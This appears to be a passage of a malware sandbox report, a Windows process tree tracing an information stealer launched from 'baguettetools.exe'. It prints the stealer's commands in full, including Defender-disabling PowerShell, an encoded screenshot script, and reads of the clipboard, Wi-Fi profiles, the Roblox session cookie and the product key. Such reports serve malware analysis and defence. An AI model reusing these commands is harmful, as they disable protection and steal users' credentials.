  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6552 /prefetch:8
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,16917819164006872980,10729058257559720598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6340 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2668
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  PID:4224
- - C:\Users\Admin\Downloads\baguettetools.exe
    "C:\Users\Admin\Downloads\baguettetools.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\baguettetools.exe'"
      4⤵
      PID:5448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\baguettetools.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:5468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:5476
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5736
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5764
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:4792
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:5328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3896
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5568
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5716
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5356
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:6156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:6060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6192
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a13mxli0\a13mxli0.cmdline"
        6⤵
        
        PID:6936
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES171D.tmp" "c:\Users\Admin\AppData\Local\Temp\a13mxli0\CSCAEA0539D2B0B42BBBCDF53CBC224816.TMP"
        7⤵
        
        PID:7128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6404
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6832
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6984
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7056
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3004
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4848"
      4⤵
      PID:6560
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4848
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1792"
      4⤵
      PID:6692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1792
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3204"
      4⤵
      PID:6472
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3204
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 216"
      4⤵
      PID:6304
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 216
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4144"
      4⤵
      PID:6912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4144
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2916"
      4⤵
      PID:6896
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2916
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1936"
      4⤵
      PID:6016
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1936
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5544
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 464"
      4⤵
      PID:6968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 464
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3176"
      4⤵
      PID:6260
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3176
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1844"
      4⤵
      PID:6728
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1844
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4272"
      4⤵
      PID:1420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4272
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:4708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5336
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\R6hVR.zip" *"
      4⤵
      PID:6992
    - - C:\Users\Admin\AppData\Local\Temp\_MEI42242\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI42242\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\R6hVR.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3500
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:3140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1820
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:7044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6624
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1600
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:3200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6424
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  PID:6052
- - C:\Users\Admin\Downloads\baguettetools.exe
    "C:\Users\Admin\Downloads\baguettetools.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4608

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1540

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x33c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\System32\rundll32.exe
